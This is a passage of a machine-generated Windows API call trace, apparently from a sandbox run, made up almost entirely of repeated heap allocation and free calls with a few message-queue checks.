hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.543] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0178.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.544] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0178.544] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0178.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0178.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0178.544] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0178.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0178.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0178.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0178.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b70 [0178.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0178.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0178.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0178.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0178.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0178.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e19f0 [0178.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0178.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0178.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b00 [0178.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0178.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0178.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3d8 [0178.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0178.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0178.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0178.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0178.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0178.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0178.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0178.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0178.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0178.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0178.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0178.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0178.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0178.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0178.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0178.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0178.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0178.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0178.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0178.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0178.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0178.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0178.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0178.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0178.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0178.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0178.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0178.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0178.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0178.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0178.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0178.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0178.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0178.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0178.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0178.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0178.546] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0178.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0178.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0178.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0178.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0178.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0178.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0178.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0178.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0178.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0178.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0178.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0178.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0178.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0178.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0178.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0178.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0178.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0178.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0178.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0178.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0178.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0178.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0178.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0178.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0178.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0178.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0178.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0178.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.547] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0178.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0178.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0178.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0178.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.548] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0178.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0178.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0178.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0178.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd348 [0178.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0178.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd630 [0178.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd720 [0178.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd588 [0178.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8d0 [0178.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0178.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4f8 [0178.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd960 [0178.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0178.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7f8 [0178.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0178.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7b0 [0178.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0178.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0178.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0178.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0178.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0178.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0178.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0178.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0178.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0178.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0178.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0178.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0178.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0178.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0178.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0178.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0178.550] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0178.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0178.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0178.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: 